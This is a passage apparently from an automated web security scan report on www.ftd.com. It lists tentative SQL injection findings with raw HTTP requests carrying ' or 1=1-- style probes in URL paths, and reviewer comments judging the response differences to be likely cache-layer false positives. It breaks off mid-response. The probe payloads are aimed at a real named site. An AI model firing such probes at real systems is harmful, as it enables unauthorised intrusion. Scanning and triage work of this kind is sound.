User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:10:23 GMT
X-Varnish: 729998810
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.17. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 31033777'%20or%201%3d1--%20 and 31033777'%20or%201%3d2--%20 (URL-decoded: 31033777' or 1=1-- and 31033777' or 1=2--) were each submitted in the REST URL parameter 3. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The injected segment here is the stylesheet filename itself, and the two responses again differ only as a cache-layer 503 (Server: Varnish, Guru Meditation, Age: 15) versus an Apache 404; neither reflects a SQL condition being evaluated. Treat as unconfirmed pending replay.

Request 1

GET /351/v20110407/ftd.css31033777'%20or%201%3d1--%20?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:12:16 GMT
X-Varnish: 730004563
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 730004563</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/v20110407/ftd.css31033777'%20or%201%3d2--%20?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:12:17 GMT
X-Varnish: 750176867
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.18. http://www.ftd.com/empty/index.epl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/index.epl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 73558935'%20or%201%3d1--%20 and 73558935'%20or%201%3d2--%20 (URL-decoded: 73558935' or 1=1-- and 73558935' or 1=2--) were each submitted in the REST URL parameter 1. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Response 1 is a 503 generated by Varnish (Server: Varnish, Guru Meditation, Age: 10), i.e. no origin response to the 1=1 probe is visible, and Response 2 is the Apache 404 page for the nonexistent directory. That is the pattern of a transient backend failure during the scan rather than of a boolean differential; replay before accepting.

Request 1

GET /empty73558935'%20or%201%3d1--%20/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:01:20 GMT
X-Varnish: 869409209
Age: 10
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869409209</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /empty73558935'%20or%201%3d2--%20/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:01:21 GMT
X-Varnish: 869409779
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.19. http://www.ftd.com/empty/index.epl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/index.epl

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11276003'%20or%201%3d1--%20 and 11276003'%20or%201%3d2--%20 (URL-decoded: 11276003' or 1=1-- and 11276003' or 1=2--) were each submitted in the REST URL parameter 2. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. As with the other ftd.com path-segment findings, the 1=1 probe received a Varnish-generated 503 (Server: Varnish, Guru Meditation, Age: 15) and the 1=2 probe an Apache 404, so the origin is not shown evaluating either payload. Unconfirmed pending replay.

Request 1

GET /empty/index.epl11276003'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Mon, 09 May 2011 01:03:13 GMT
X-Varnish: 1301377694
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1301377694</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /empty/index.epl11276003'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:03:14 GMT
X-Varnish: 540321110
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.20. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 17774407'%20or%201%3d1--%20 and 17774407'%20or%201%3d2--%20 (URL-decoded: 17774407' or 1=1-- and 17774407' or 1=2--) were each submitted in the REST URL parameter 1. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The modified path is the TeaLeaf client-event collector, reached by POST with an XML body; Response 1 is a Varnish-generated 503 (Server: Varnish, Guru Meditation, Age: 15) and Response 2 the Apache 404 page, so the difference lies in the cache/backend path rather than in any SQL evaluation. Unconfirmed pending replay.

Request 1

POST /empty17774407'%20or%201%3d1--%20/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:40 GMT
X-Varnish: 750156331
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750156331</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

POST /empty17774407'%20or%201%3d2--%20/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123193
Date: Mon, 09 May 2011 01:06:41 GMT
X-Varnish: 540333250
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.21. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14521499'%20or%201%3d1--%20 and 14521499'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /empty/tealeaf.epl14521499'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:34 GMT
X-Varnish: 729992096
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
